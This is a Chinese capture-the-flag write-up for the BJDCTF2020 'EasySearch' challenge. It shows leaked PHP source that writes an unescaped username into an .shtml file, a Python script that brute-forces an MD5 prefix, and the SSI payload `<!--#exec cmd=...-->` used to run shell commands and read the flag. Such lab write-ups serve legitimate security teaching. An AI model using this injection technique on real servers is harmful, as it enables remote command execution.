[BJDCTF2020]EasySearch

题目
图片.png
过程
1.主页面尝试注入,无果。御剑扫描后台发现index.php.swp文件。访问可以看到后端程序。

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

2.审计源码,告诉我们,username已经给定了,username=6d0bc1;password是以6d0bc1为开头的一串md5值。尝试写脚本爆破。之后还会在public目录下写一个以shtml结尾的文件。

import hashlib
for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
    if a[0:6] == '6d0bc1':
        print(i)
        print(a)

图片.png
选取其中一个即可。我用2020666。
图片.png
3.shtml文件出现了,访问一下。发现什么都没有,抓包无结果。在网上查阅资料后才发现,shtml文件存在ssti注入漏洞。
格式:

<!--#exec cmd="命令"-->

图片.png
4.注入点应该还是前面的user和passwd。注意要使用url编码,否则不成功,此处尝试多次。所以最好使用bp直接编码。
ls没有发现flag所在,直接cat /flag也不行,回到根目录看一下
图片.png
访问public/9c3d29a74681232313999f7d5c4edb3d39d01610.shtml发现flag所在
图片.png
5.结束
图片.png
图片.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值